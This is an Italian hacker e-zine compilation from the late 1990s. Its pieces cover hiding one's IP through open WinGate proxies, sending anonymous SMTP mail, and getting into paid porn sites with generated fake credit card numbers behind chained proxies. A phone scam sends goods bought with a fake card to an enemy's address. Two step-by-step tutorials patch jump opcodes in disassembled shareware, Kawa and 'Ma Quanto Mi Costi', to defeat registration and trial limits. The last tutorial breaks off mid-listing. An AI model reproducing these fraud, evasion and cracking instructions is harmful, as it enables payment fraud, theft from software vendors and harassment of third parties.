IRC sempre con l'IP del computer che ci ospita (ah, cosa importante, spesso questo programma non logga nemmeno chi si collega a lui, quindi potete stare piu' tranquilli dei proxy, ma comunque e' bene tenere gli occhi aperti...). Ovviamente per una maggiore sicurezza(dipende che state facendo...si puo' saltellare da un gate ad un altro sempre con lo stesso metodo che vi diro' tra un po': anche se tutti vi loggano, non risaliranno mai a voi, costerebbe troppo ('troppo' non esiste se siete entrati nel FBI e avete scritto 'IDIOTI' su tutti i loro monitor attivi...). Ma prima... "Come li trovo 'sti Gateway?" Ci sono diversi modi: uno e' beccare un programma che fa lo scan di una serie di indirizzi IP alla ricerca di WinGate (io utilizzo WinGateScan 2.1 - cercate e troverete - in caso contattatemi pure): il gioco funziona ed e' pure facile. Un'altra pssibilita' consiste nel cercare tramite IRC. Molti server IRC rifiutano le connessioni da parte di WinGates e bannano chi fa richieste di connessioni di questo tipo: tali rifiuti si chiamano 'g-line'. Trucco: se scrivete su un programma IRC (mIRC dovrebbe andar bene) /stats g vi si dovrebbero fornire una serie di IP con una comunicazione del tipo "xxx.xxx.xxx.xxx insecure WinGate rejected" beh, avete trovato i vostri WinGate (ovviamente non potrete utilizzarli con IRC dal momento che sono stati gia' rifiutati). Anche utenti bannati con questo messaggio "Automatically banned for excessive connections" possono essere possibili WinGate. Controllate che funzionino bene prima di fare troppo affidamento su di essi. E mo'? "Addentriamoci..." 'Telnettate' (che schifo di termine!) nell'IP address prescelto, porta 23, se vi da' il benvenuto una bella scritta 'WinGate>', beh ci siete, siete dentro al vostro primo WinGate. Per saltare ad un altro gate seguite lo stesso procedimento via telnet. Il tutto si puo' fare anche dal vostro programmino IRC: scrivete /server xxx.xxx.xxx.xxx 23 e siete sul gate.Dopodiche' collegatevi al vostro server IRC preferito con /raw irc.fucker.undernet.org e indicate il vostro nick e il vostro username /raw nick Away /raw user Away 0 0 :AwayNET (Molti programmi IRC potrebbero usare /quote al posto di /raw.) Allo stesso modo potrete usare questo giochino per mandare mail senza il vostro IP (perche' lo sapete che e' sempre inserito nell'header delle vostre comunicazioni, no?). Basta collegarsi dal WinGate al server di posta nella porta 25 (SMTP) con mail.fucker.com 25 Per spedire mail, i comandi sono quelli standard dell'SMTP - li sto studiando quindi o ve li cercate in giro (e se li trovate magari me ne spedite una copia, grazie) oppure aspettate il mio prossimo articolo sull'argomento. Orientativamente si dovrebbe scrivere qualcosa di simile: HELO 'nome del host' MAIL FROM: 'indirizzo' (non so se questo accetta indirizzi falsi, cosi' abbiamo risolto il problema della email anonime...) RCPT TO: 'indirizzo destinatario' SUBJECT: '...' <-indovinate? poi tutto quello che volete scrivere...e alla fine . <- si proprio un punto e poi QUIT Provate, fatemi sapere, e se trovate docs su come spedire file in attachment o informazioni esatte (se queste fossero sbagliate), beh, fatemele avere! Beh...e' tutto...se questo file vi ha offeso in qualche modo...sorry...o meglio....fuck you! - l'ho detto, e' solo a scopo educativo....:) (Questo articolo e' una traduzione approssimativa ed arricchita(spero) di 'Anonymous Hacking' di un certo AlphaVersion - non voglio fare di certo il lamer e dire che l'ho fatto tutto io!) AWAY THREENAILS www.nails.cjb.net away@softhome.net !from the Attila Hack crew! +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- COME HACKERARE I SITI PORNO E ANCHE GUIDA AI SERVER PROXY Come hackerare un sito porno : by LiQUID '"+- +- +- +- +- +- +- +- +- ' Come Hackerare i siti porno -=-=-=-=-=-=-=-=-=-=-=-=-=- '" Powered by [LiQUID] Indice: 1/4 00 Indice ;) \ / /$#@ ] 01 Disclaimer \++++++++++/-------/ $#@ ] 02 Teoria \ / / $#@ ] 03 Cosa vi serve \ /\ / $#@ ] 04 Toria - 2 parte, i proxy \ / \ / $#@ ] 05 Come procedere \ / \ / $#@ ] Ŀ \ / \ / $#@ ] liquido@freemail.it 1/4+-+-+-\/+-+-+-\/+-+-+-+#@ ] Disclaimer Prima di iniziare vorrei dire che l'autore (io) non puo' essere coinvolto o ritenuto colpevole se succedesse qualcosa di ....strano ;) Inoltre non promette nulla riguardo il corretto funzionamento di questa semplice tecnica. Se pensate di essere coinvolti in qualsiasi maniera in brutte faccende leggendo il testo qui di seguito, fermatevi immediatamente e cancellate questo sporco pugno di bit dal vostro piccc! ;-P Se per caso voi veniste coinvolti lo spirito di affrontare questa spiacevole situazione e': 'Io non c'ero, non sono mai esistito, non ne ho la piu' pallida idea di come quello sporco pugno di bit sia finito nel mio picci'!' Oki, ora che ci siamo chiariti le idee possiamo anche incominciare! Teoria La tecnica che spieghero' qui di seguito e' molto semplice. Consiste nell'entrare in un sito porno, e, trovandoci sbarrata la strada, ci sentiremo esclusi da dolci immagini :) e non possima entrare se non pagando quello che potrebbe essere buon prezzo se non fosse gestito da avidi profittatori. Con la nostra consapevolezza cerchiamo di varcare queste barriere, poi.......hmm slurp, che belle imaginette ;) Cosa vi serve - un picci' monito di monitor, tastiera, mouse, modem, ed account (anche falso :)) per entrare nella grande rete - si puo' trovare in un qualsiasi negozio informatico; - un GenerId, ovvero un generatore di carte di credito false :) - se ne trova una copia in quasi tutti i siti warez presenti sulla rete (se posso dare un consiglio, a me piace molto quello del mitico Cavallo de Cavallis, al sito http://members.tripod.com/~CavallodeCavallis/index.html); - una buona lista di proxy server anonimi (per verificare se sono veramente anonimi andate col proxy al sito http://www.anonymizer.com) - il problema di come trovarli verr affrontato dopo; Direi basta. Teoria - 2 parte, i proxy: Qui di seguito riportero' una parte dell'Enciclopedia di Lord Shinva, riguardante i proxy, appunto: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ANONIMITA' E PROXY ~~~~~~~~~~~~~~~~~~ Cos'e` un proxy? Senza entrare troppo nel dettaglio, si tratta di un server che vi permette di accedere a un servizio (generalmente WWW ma talvolta anche FTP, Gopher e altri) senza mostrare il vostro IP address. Infatti, sia che navighiate sul Web o che effettuiate operazioni via FTP, l'IP rivelato sara` quello del server proxy anziche` il vostro. Ma come funziona? Ecco un esempio. Immaginate di inserire l'indirizzo di un sito web nel vostro browser... questo contattera` il server contenente le pagine che vi interessano, e le scarichera` direttamente da li`. Ovviamente il sysadmin del sito avra` il vostro IP address e molte altre informazioni su di voi (da quale pagina provenivate, che tipo e versione di browser utilizzavate, ecc). Se attivate il servizio di proxy, invece, le cose vanno diversamente. Supponiamo che vogliate collegarvi al sito hacker http://kr0mecorp.home.ml.org Questo indirizzo verra` mandato al proxy, che vi si colleghera`, scarichera` la pagina principale e ve la mandera`. L'IP address registrato dal sito sara` quello del proxy, in quanto e` stato il proxy server a collegarsi al sito, non voi ;) Come si configura un browser per utilizzare il proxy? E` presto detto. Vi faro` un esempio per Netscape (Navigator o Communicator). Se utilizzate Micro$oft Explorer non vi spieghero` come fare... passate a Netscape o arrangiatevi... la roba della Micro$oft e` SEMPRE spazzatura. Dal menu` preferences di Netscape selezionate advanced e poi proxies, quindi manual proxy configuration e poi il bottone view. Ora potrete inserire nella prima riga (HTTP) il nome del server proxy e poi la porta. Noterete che ci sono altre caselle libere: FTP, Gopher, ecc. Se il proxy server supporta quei servizi, inserite nome del server e porta nelle rispettive locazioni e potrete accedere anonimamente anche a quei servizi. Ora siete pronti per navigare, e cio` avverra` in modo trasparente sia per voi che per la macchina alla quale vi collegate. Se volete usare un proxy FTP, probabilmente vorrete utilizzare un client come CuteFTP oppure WS-FTP, anziche` il browser... le operazioni per configurare tali client sono molto simili, basta trovare il menu` di configurazione e inserire nome e porta del proxy da utilizzare. Niente di piu`. Bene, ora sappiamo come utilizzare i proxy... ma dove possiamo reperirne uno funzionante da utilizzare? Il metodo che vado ad illustrarvi e` quello che uso io e che si e` rivelato efficace nella maggior parte dei casi. Buona parte dei server proxy hanno un nome che inizia con "proxy." (ad esempio proxy.pingnet.ch) oppure con "cache" (o "wwwcache" o "webcache"), e utilizzano come numero di porta uno dei seguenti: 3128, 8000, 8001, 8080, 80, 81, 800 (e raramente varianti di questi). Basandoci su queste considerazioni, trovare i proxy e` quindi semplicissimo: prendete un host qualsiasi, meglio se vi sta antipatico, tipo il Berlusconiano www.mediaset.it oppure www.leganordsen.it (sito web del re assoluto dei cretini e degli ignoranti) e trasformate l'host name in un possibile nome "da proxy", ad esempio proxy.leganordsen.it (ovviamente non provate questo, e` probabile che un sito di merda come quello della Lega Nord non abbia neanche un proxy...). A questo punto dovrete utilizzare uno dei numeri di porta elencati sopra. Prima di sperimentare tutte le porte, vi converra` controllare che il proxy esista. Potete farlo in due modi: o utilizzate l'utility Ping oppure provate a navigare dopo aver configurato il proxy... se comparira` la finestra di errore di netscape, l'host non esiste. Se invece lo status indica "contacting host proxy.xxxxx.com..." troppo a lungo, vuol dire che la porta non e` quella esatta; cambiatela e riprovate. Avrei molti proxy da elencarvi, ma dato che i rispettivi sysadmin si accorgerebbero dell'improvviso... incremento di utenza ;) diventerebbero presto inutili. Trovarli e` comunque, come avete avuto modo di vedere, un processo estremamente semplice e potrebbe facilmente essere automatizzato, creando uno scanner che faccia da solo il lavoro, magari scritto in Perl... Ricordate, *qualunque* host va bene, italiano o straniero, grande o piccolo, di importanti societa` o piccoli providers. Talvolta non troverete il proxy... beh, ci sono tanti altri siti da provare ;) Fate una ricerca per una parola qualsiasi su un motore di ricerca, ed eccovi tutti i server di cui avete bisogno.... centinaia di migliaia. Oppure utilizzate la ricerca avanzata di Altavista e cercate i server che iniziano per "proxy." ... le possibilita` sono infinite. Tenete presente che anche i proxy server registrano il vostro IP address, quindi non fate stupidaggini. Se proprio volete un maggiore grado di sicurezza, concatenate i server in questo modo: http://primo_proxy:porta/http://secondo_proxy:porta/http://www.sito.com/ Piu` lunga e` la catena, piu` difficile sara` rintracciarvi, specie se uno dei siti della catena cancella i log di accesso piu` frequentemente degli altri (e non e` una cosa rara... ;)). Un'ultima parola va detta sui wingates. Wingate e` un software che permette di condividere un collegamento a internet da molti pc. Peccato solo che non abbia nessuna password di protezione ;) e cosi` chiunque si colleghi a un server che ha wingate in funzione possa usare quel server come se fosse un proxy, e per giunta senza neanche lasciare la benche` minima traccia! Per trovarli, prelevate uno scanner di wingate da internet nel solito modo: collegatevi (ad esempio) a www.altavista.digital.com e cercate le parole "wingate scanner". Troverete molti siti dai quali scaricare uno scanner. Usate lo scanner su vari servers fino a trovare qualche wingate funzionante. Eccovi una lista, che pero` probabilmente sara` presto inutile per le ragioni spiegate sopra per i proxy: www.este.net mrenner.bevc.blacksburg.va.us netgate.maret.org pc300057.multiweb.net cda-bitclub.netbusiness.it dyn.ml.org chamail.ozemail.com.au sandbox.pacificnet.net michae3.lnk.telstra.net pmzproxy.pmz.com showcad.demon.co.uk Una volta in possesso di qualche sito potete collegarvi alla porta 23 per accedervi. Informazioni dettagliate le trovate su http://demoniz.bikkel.com E... si, sono in INGLESE. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Per semplificarvi la vita (hihihihihihihi, ora ce lo dici ;)))))) lo schema proxy e' questo: Io senza proxy: Ŀ Ŀ IO -=-=-=-=-=-=-=-=-=-=- PoRN4Zz0 Io col Proxy Ŀ Ŀ Ŀ IO -=-=-=-=-=- Pr0XY -=-=-=-=-=- PoRN4Zz0 Come Procedere Allora ragazzi, arrivati al vostro bel pornazzo, entrate nella sezione dedicata al pagamento, inserite il vostro bel numero di fake cc (credit card) aspettate la passwd, e slurp! Guardate bene bene il vostro sitazzo e rifatevi gli occh ;))))) Ma voi mi chiedere perche' tutta quella noisissima storia sui proxy?? La risposta e' questa: Se io senza proxy mi collego al sito, e commetto un atto illegale (cc fake), il mio ip compare sui log del sito, ma se io uso 1 proxy......l'ip che appare e' quello del server proxy :)))))))))))))) Io vi consiglio di usare piu' proxy, in modo da essere meno raggiungibile e piu' nascosti ;-P Ed ora ragazzi.........RIFATEVI GLI OCCHI!!!!!!! La rete e' piena di siti xxx, girate e girate!!!!!!!!! by [LiQUID] liquido@freemail.it PS= Ricordo che questa tecnica pu essere applicata in moltissimi altri campi, per esempio come farsi un account falso, dando la fake cc al servizio on-line della tin, oppure se avete una voce seria potete anche fare telefonate di questo genere: io > Scusi vorrei acquistare un vostro prodotto con carta di credito centralino > va benissimo, mi dica il numero io > ok, xxxxxxxxxxxxxxx centralino > ok io > ma signorina, io lavoro, ci sono solo alle 3 del pomeriggio centralino > ok, mi dica l'indirizzo io > via xxxxxxxxxxxxxx centralino > ok alle 3 del pomeriggio vai all'inirizzo del tuo nemico, e appena arriva il postino ritiri tu il pacco :))))) ciao raga!!!!!!!!!! +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- 01010011 01100101 01111010 01101001 01101111 01101110 01100101 BoBo & LaNdo 01000011 01110010 01100001 01100011 01101011 01101001 01101110 01100111 Hahaha solo un vero craccatore pu capire cosa c' scritto qua:) Mi sono proprio divertito a scriverlo, grazie molte b0nu$ per i tuoi tute, hai visto che a qualcosa sono serviti???? Hehehe adesso scrivo in codice binario :)) BoBo FIRST CRACK: by Away Tutorial: Cracking by Example : CRACKING DI PROGRAMMI PER WINDOWS by /\ \ \/ / /\ \ / /\/\ \/\/ /\/\ \/ , 22 7 99 THREE NAILS / "This is the first step your soul will take up to the sky..." da "Divine Step" - Coroner ----------------------------------------------- Needs : WinDASM 32 (disassemblatore) (va bene anche il SoftICE) HexEditor (editor esadecimale) (anche un qualsiasi altro editor hex) Kawa 2.51 (il programma da crackare) ----------------------------------------------- Prima di iniziare: Beh, sono le mie prime esperienze da cracker, quindi scusate possibili idiozie(e magari qualche correzione da chi ne sa di pi potrebbe non fare schifo ... un'email e il gioco fatto), o la banalit di certe cose, ma un tutorial tanto per iniziare, facile facile, niente di impegnativo...insomma se vi fa schifo OR vi serve qualcosa di pi 'professionale' passate ad altro... Va beh, si comincia: Kawa un IDE per Java che avevo installato tempo fa nel mio computer per un progetto: ma che succede? A met progetto circa, il signor Kawa mi dice "Ehi, il tuo tempo scaduto! Comprami!" - Vaffanc*lo! Ci devo lavorare io, che seriet del ca**o(!)!!! :) Cos mi armo di qualche programma utile trovato in giro nella grande ragnatela (sono shareware, registrati...ma nel nostro caso vanno bene anche se non sono registrati) e di un p di pazienza. L'idiozia media dei programmi shareware sta nel fatto di chiedervi la password per registrarsi e, in caso di password errata, di far apparire una finestra che ti avverte dell'errore. Aha!!!!!! Il 99% dei programmi usa una finestra di messaggio standard, sta nella libreria API di Win e si chiama MessageBox(). Deduzione logica: all'interno del codice del programma, da qualche parte, quasi sicuramente vicine ci sono le funzioni di controllo della password e la chiamata alla API MessageBox() (se non sono proprio vicine, ci sono vicine le chiamate a due pezzi di codici che fanno le due cose - chi ha fatto il programma furbo(!?), ha fatto procedure separate, ma a noi poco importa, no? - in ogni caso un p di pratica e un minimo di conoscenza di assembler non guasta...). Passo Uno: disassemblare il programma con il WinDASM32, otterremo il suo listato in assembly, non preoccupatevi, non dovete conoscere il linguaggio, vi bastano sapere un paio di cose di cui parler tra un p. Cerchiamo la chiamata al MessageBox() che ha come parametro la stringa che ci appare per avvisarci della password errata - guardare un p come funziona il WinDASM32, c' il file di help, molto semplice e questo non un tutorial su come si usa il WD32 - e diamo un'occhiata al codice l intorno... Ehi, ma cos' quello? un confronto tra variabili (CMP o TEST) e un salto se sono uguali (JE). Vi suggerisce qualcosa? Possibile che le due variabili contengano il codice da noi inserito a caso e quello funzionante? Naaaa, trooppo facile... Proviamo. Per ricordatevi che lavoriamo con eseguibili, quindi non si deve inserire codice assembly, ma direttamente codice macchina. C' da conoscere l'opcode (equivalente in linguaggio macchina) relativo alle varie istruzioni: la tabella successiva fornisce ci di cui abbiamo bisogno: Istruzione Opcode JA rel8 77 cb JAE rel8 73 cb JB rel8 72 cb JBE rel8 76 cb JC rel8 72 cb JCXZ rel8 E3 cb JE rel8 74 cb - salta se uguali JG rel8 7F cb JGE rel8 7D cb JL rel8 7C cb JLE rel8 7E cb JNA rel8 76 cb JNAE rel8 72 cb JNB rel8 73 cb JNBE rel8 77 cb JNC rel8 73 cb JNE rel8 75 cb - salta se non sono uguali JNG rel8 7E cb JNGE rel8 7C cb JNL rel8 7D cb JNLE rel8 7F cb JNO rel8 71 cb JNP rel8 7B cb JNS rel8 79 cb JNZ rel8 75 cb JO rel8 70 cb JP rel8 7A cb JPE rel8 7A cb JPO rel8 7B cb JS rel8 78 cb JZ rel8 74 cb JMP rel8 EB cb - salta in ogni caso JMP rel16 E9 cw JMP rm16 FF /4 JMP ptr16:16 EA cd JMP m16:16 FF /5 Il vostro neurone preferito ha iniziato ad agitarsi? Si? Ok, annotatevi l'offset del punto del programma che ci interessa (il punto a partire dall'inizio in cui c' l'istruzione da modicare). Aprite il Kawa.exe con l'HexEditor, saltate al punto con GOTO x e che trovate? 74xx vii ricorda JE? Geniale... Lo cancelliamo, e che inseriamo al suo posto? Come avete detto, EBxx ? Ma dai, non mi dite... Dopodich salviamo e proviamo il programma, registriamoci(o almeno facciamo il tentativo...) e che succede? Il programma esce? Possibile ->> abbiamo sbagliato controllo (quel CMP fa un'altra cosa, capita...): beh che si fa? Ricominciamo con quell'altro CMP l vicino...stesso procedimento e poi di nuovo prova. (ricordatevi per prima di rimettere a posto quella modifica inutile - potresti rendere il programma inutilizzabile - stessa cosa se provando il programma, non funziona, avete cambiato qualcosa che non si doveva toccare...) Come dite, il programma adesso si prende qualsiasi password e parte correttamente? beh, tutto, avete crackato il vostro primo programmino (magari non proprio da soli...), now be happy... Tutto ok? Questo tutto, fate pratica con altri programmi, e se funziona allora forse questo tutorial vi servito a qualcosa. Consiglio inoltre di downloadare il tutorial di Xoanon - lo trovate in giro - anche nel sito di Attila_Hack ( molto interessante - bravo Xoanon!) "We are the voice. Do not shut us out." A W A Y T H R E E N A I L S from the Attila_Hack Crew away@softhome.net +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- COME CRACCARE MA QUANTO MI COSTI 3.0: by Ritz ******************************* * * * Ma Quanto Mi Costi 3.0 * * * * by Ritz * * * ******************************* BEST VIEWED WITH M$-d0$ 3D1T0R ****************************************************************************** DESCLAIMER LEGALE: Ascoltatemi bene prima di leggere questo articolo: esso stato scritto a PURO scopo DIDATTICO: io, Ritz, non incoraggio chi volesse servirsene per scopi illegali; inoltre non mi assumo alcuna responsabilit... se vi autodistruggete i progammi. CAPITTOOOO?! ****************************************************************************** Ciao a tutti! Io mi chiamo Ritz, e in questo tute cercher di spiegare la sprotezione di un programma che non offre alcuna possibilit di registrazione (o almeno io non l'ho trovata... :-) ). Di conseguenza, l'unica cosa da fare sar forzare il codice in alcuni punti. Dopo aver fatto ci, sar inoltre necessario togliere un fastidioso nag-screen iniziale. Il proggy si trova in varie riviste informatiche o al sito: www.space.tin.it/internet/apizzegh e funge da contascatti per Internet. OK... tutti pronti? S? Perfetto... sigaretta, Martini Dry, VIA! SE PARTE!! Allora, installato il programmillo? Perfetto... avviatelo: cercare ora un men- tipo About/Register. Azz, non c', provate ora a guardare l'iconetta del Systray: clic destro, scegliete "Informazioni su MQMC32", vi apparir un menu... okkakkio, nemmeno l si pu mettere il serial... come si fa? Beh, evidentemente il programma uno di quelli che dopo 30 gg. si suicidano e basta. Quindi? Semplice... chiudete l'icona del Systray, portate avanti la data di 4-5 mesi, riavviate il prog... e, eccovi apparire il messaggio che vi dice che non lo potete pi- avviare perch il periodo di valutazione scaduto. Male, molto male. Bisogna lavorarci un po' su, che ne dite? Allora, innanzi tutto bisogna far s che il prog. possa essere avviato... proviamo quindi a intercettare la funzione che manda il nag iniziale... CTRL+D per poppare nel Sice, quindi bpx messageboxa. Usciamo con CTRD+D, riavviamo tutto, e... kakkio il debugger non poppa prima della messagebox... perch mai? Se avete notato, quando il messaggio appare il PC fa un "beep", vero? Bene, allora proviamo a cambiare il BPX con un messagebeep: togliete l'iconetta del MQMC dal Tray, entrate nel Sice, scrivete bpx messagebeep, uscite, avviate il MQMC, e, voil..., il vostro debugger preferito fa la sua comparsa!! Usciti dalla funzione con F11, dovreste attraccare qui: :0048A202 PUSH 32 S? Perfetto! Adesso cancellate tutti i bpx del Sice con bc *, aprite il vostro W32dasm, disassemblate il file mqmc32.exe... bzzzzzzzzz....zzzzzz... bzzzzzzzz. Finito!! Ora andate nel menu Search/Find text, scrivete :0048A202, aspettate un po'... e dovreste arrivare a questo punto: * Possible StringData Ref from Code Obj ->"10474" | :0048A1D9 mov edx, 0048A63C :0048A1DE call 00403F04 :0048A1E3 jne 0048A228 <-- Jump importante... servir... un po' pi- avanti. :0048A1E5 mov eax, dword ptr [0049C244] :0048A1EA cmp dword ptr [eax], 00000000 :0048A1ED je 0048A1FB :0048A1EF mov eax, dword ptr [0049C244] :0048A1F4 mov eax, dword ptr [eax] :0048A1F6 call 00430A74 * Jump at Address: |:0048A1ED(C) | :0048A1FB push 00000000 * Reference To: user32.MessageBeep, Ord:0000h | :0048A1FD Call 00406C9C :0048A202 push 00000032 :0048A204 mov cx, word ptr [0048A644] :0048A20B mov dl, 02 * Possible StringData Ref from Code Obj ->"MQMC323.0" | :0048A20D mov eax, 0048A650 :0048A212 call 00444C24 :0048A217 mov eax, dword ptr [0049C28C] :0048A21C mov eax, dword ptr [eax] :0048A21E call 00432A34 :0048A223 jmp 0048A5A7 * Jump at Address: |:0048A1E3(C) | :0048A228 8D4DB0 lea ecx, dword ptr [ebp-50] Allora... analizziamo il codice... in 48A1FD c' la call del nag-screen... osservando ora 48E1ED si vede un JE... Jump if Equal... cambiandolo in JMP si salterebbe la CALL a 41A8F6... implicata probabilmente nel suicidio del programma dopo il suo avvio. Dunque, segnatevi l'OFFSET di 48E1ED: dovrebbe essere 895ED... bene, fatevi una copia di MQMC.exe e lasciatela nella stessa cartella, aprite Hiew, caricate la copia, premete F4, scegliete Decode, poi F5, scrivete l'OFFSET, premete INVIO, quindi F3 per cambiare il byte 75 in EB (jump incondizionale), F9 per aggiornare lo schermo, F10 per uscire. Ora dalla cartella del MQMC caricate la copia (quella taroccata), e vi apparir... ancora il nag (questo era previsto), ma, se cliccate OK, il prog PARTE!! Lo avete crackaaatooo. Se ci siete riusciti, complimenti, altrimenti rileggetevi tutto daccapo... Ora per c' un piccolo problema teknico: il nag-screen che rompe le palle: uhm... vediamo che se po' fa'. Vedete la call a 48A1FD? Quella sar... la routine da fottere: infatti, proprio quella che richiama la Message Box. Fateci doppio clic col topo e in mezzo alla barra dei pulsanti del Dasm dovrebbe "accendersi" una scritta: CALL. Cliccateci sopra. (* Cazzo mi si sta inkiodando il Winkaz... 67% risorse disponibili... pork putt meglio riavviare... schiusatemi un attimo... torno subito, il mio Celeron overclokkato tra un po' si fonde... OK ho riavviato... ora mi sento pi- tranquillo... ripartiamo*). Avete cliccato sulla CALL? Bene, allora ora vi trovate qui: * Referenced by a CALL at Addresses: |:00455B69 , :00455E97 , :00458189 , :00461087 , :004612F6 |:00461326 , :0046A09B , :0046A100 , :0046ABB4 , :0046AC3D |:0046ACAF , :0046AD10 , :0046AD71 , :0046ADDE , :0046B8A6 |:0046B909 , :0047E62A , :00484B80 , :00484F17 , :0048A1FD |:0048A3AE , :0048A42F , :0048D945 , :00491AA1 , :004922CD |:00492AC6 , :0049328D | * Reference To: user32.MessageBeep, Ord:0000h | :00406C9C Jmp dword ptr [0049F66C] :00406CA2 mov eax, eax In teoria ora bisognerebbe fare un lavoretto, ovverosia (WOW!) spulciare OGNUNO degli indirizzi sopra... fate una prova: andate a :00455E97. Due righe pi- in altro vedrete un jne che, se eseguito, SALTA COMPLETAMENTE VIA la call. Ecco quindi che bisognerebbe cambiarlo in JMP. Tornate ora a :00406C9C; capito cosa dovete fare? Andare in OGNUNA dlle CALL sopra, trovare i JUMP che le saltano e cambiarli in JMP incondizionali... il problema che non tutte tali call sono necessarie, anzi, e inoltre alcune, come ad esempio la prima (:00455B69), non hanno jump che le possano evitare nei dintorni... insomma, un casino... ecco perch ho deciso di dirvi io direttamente quali sono quelle su cui agire (vi pensate che lavorazzo ho fatto?!): l'importante che voi capiate il concetto per poi poterlo applicare nelle varie occasioni. Andate in :0048A1FD. Vi troverete nel codice visto all'inizio: ecco a cosa serve il jne a :0048A1E3!!! E' uno di quelli che fottono la CALL!! Infatti se eseguito il proggy salta pi- avanti! Ora posteggiate il kulo in :0048A3AE. Sarete qui: * Possible StringData Ref from Code Obj ->"0003" | :0048A321 mov edx, 0048A728 :0048A326 mov eax, dword ptr [ebx+00000220] :0048A32C call 0045FA70 :0048A331 lea edx, dword ptr [ebp-50] :0048A334 lea eax, dword ptr [ebp-40] :0048A337 call 00404C0C :0048A33C mov eax, dword ptr [ebp-40] :0048A33F lea ecx, dword ptr [ebp-3C] :0048A342 mov edx, 00000004 :0048A347 call 00489D84 :0048A34C mov ecx, dword ptr [ebp-3C] :0048A34F lea eax, dword ptr [ebp-38] :0048A352 mov edx, 0048A630 :0048A357 call 00403E40 :0048A35C mov eax, dword ptr [ebp-38] :0048A35F call 00407F84 :0048A364 mov dword ptr [ebp-54], eax :0048A367 fild dword ptr [ebp-54] :0048A36A add esp, FFFFFFF8 :0048A36D fstp qword ptr [esp] :0048A370 wait :0048A371 lea eax, dword ptr [ebp-04] :0048A374 call 00409D38 :0048A379 cmp dword ptr [ebp-04], 00000000 :0048A37D je 0048A3D9 :0048A37F mov eax, dword ptr [ebp-04] :0048A382 call 0040A4B0 :0048A387 fstp qword ptr [ebp-1C] :0048A38A wait :0048A38B fld qword ptr [ebp-0C] :0048A38E fcomp qword ptr [ebp-1C] :0048A391 fstsw ax :0048A393 sahf :0048A394 jnb 0048A3D9 <-- Jump if not below... interessante non vi sembra? :0048A396 mov eax, dword ptr [0049C244] Guardate DOVE salta: DOPO la CALL :0048A39B cmp dword ptr [eax], 00000000 a :0048A3AE!! Bene bene... :0048A39E je 0048A3AC :0048A3A0 mov eax, dword ptr [0049C244] :0048A3A5 mov eax, dword ptr [eax] :0048A3A7 call 00430A74 * Jump at Address: |:0048A39E(C) | :0048A3AC push 00000000 * Reference To: user32.MessageBeep, Ord:0000h | :0048A3AE Call 00406C9C :0048A3B3 push 00000032 :0048A3B5 mov cx, word ptr [0048A644] :0048A3BC mov dl, 02 * Possible StringData Ref from Code Obj ->"MQMC323.0" | :0048A3BE mov eax, 0048A650 :0048A3C3 call 00444C24 :0048A3C8 mov eax, dword ptr [0049C28C] :0048A3CD mov eax, dword ptr [eax] :0048A3CF call 00432A34 :0048A3D4 jmp 0048A5A7 * Jump at Addresses: |:0048A37D(C), :0048A394(C) | :0048A3D9 mov cx, word ptr [ebp-28] :0048A3DD mov dx, word ptr [ebp-26] :0048A3E1 mov ax, word ptr [ebp-24] :0048A3E5 call 00408F88 :0048A3EA fstp qword ptr [ebp-5C] :0048A3ED wait :0048A3EE mov cx, word ptr [ebp-22] :0048A3F2 mov dx, word ptr [ebp-20] :0048A3F6 mov ax, word ptr [ebp-1E] :0048A3FA call 00408F88 :0048A3FF fsubr qword ptr [ebp-5C] :0048A402 call 00402A98 :0048A407 mov word ptr [0049DC04], ax :0048A40D cmp word ptr [0049DC04], 001E :0048A415 jbe 0048A485 :0048A417 mov eax, dword ptr [0049C244] :0048A41C cmp dword ptr [eax], 00000000 :0048A41F je 0048A42D :0048A421 mov eax, dword ptr [0049C244] :0048A426 mov eax, dword ptr [eax] :0048A428 call 00430A74 Infine in :0048A42F. Attraccherete qui: * Jump at Addresses: |:0048A37D(C), :0048A394(C) | :0048A3D9 mov cx, word ptr [ebp-28] :0048A3DD mov dx, word ptr [ebp-26] :0048A3E1 mov ax, word ptr [ebp-24] :0048A3E5 call 00408F88 :0048A3EA fstp qword ptr [ebp-5C] :0048A3ED wait :0048A3EE mov cx, word ptr [ebp-22] :0048A3F2 mov dx, word ptr [ebp-20] :0048A3F6 mov ax, word ptr [ebp-1E] :0048A3FA call 00408F88 :0048A3FF fsubr qword ptr [ebp-5C] :0048A402 call 00402A98 :0048A407 mov word ptr [0049DC04], ax :0048A40D cmp word ptr [0049DC04], 001E :0048A415 jbe 0048A485 <-- Jump if below or equal... WOW un altro che salta :0048A417 mov eax, dword ptr [0049C244] DOPO la CALL!! :0048A41C cmp dword ptr [eax], 00000000 :0048A41F je 0048A42D :0048A421 mov eax, dword ptr [0049C244] :0048A426 mov eax, dword ptr [eax] :0048A428 call 00430A74 * Jump at Address: |:0048A41F(C) | :0048A42D 6A00 push 00000000 * Reference To: user32.MessageBeep, Ord:0000h | :0048A42F Call 00406C9C :0048A434 lea ecx, dword ptr [ebp-38] :0048A437 mov edx, 00000006 :0048A43C mov eax, 000028EA :0048A441 call 00489F6C :0048A446 mov edx, dword ptr [ebp-38] :0048A449 lea eax, dword ptr [ebp-50] :0048A44C call 00404C60 :0048A451 lea ecx, dword ptr [ebp-50] * Possible StringData Ref from Code Obj ->"0001" | :0048A454 mov edx, 0048A620 :0048A459 mov eax, dword ptr [ebx+00000220] :0048A45F call 0045F848 :0048A464 push 00000032 :0048A466 mov cx, word ptr [0048A644] :0048A46D mov dl, 02 * Possible StringData Ref from Code Obj 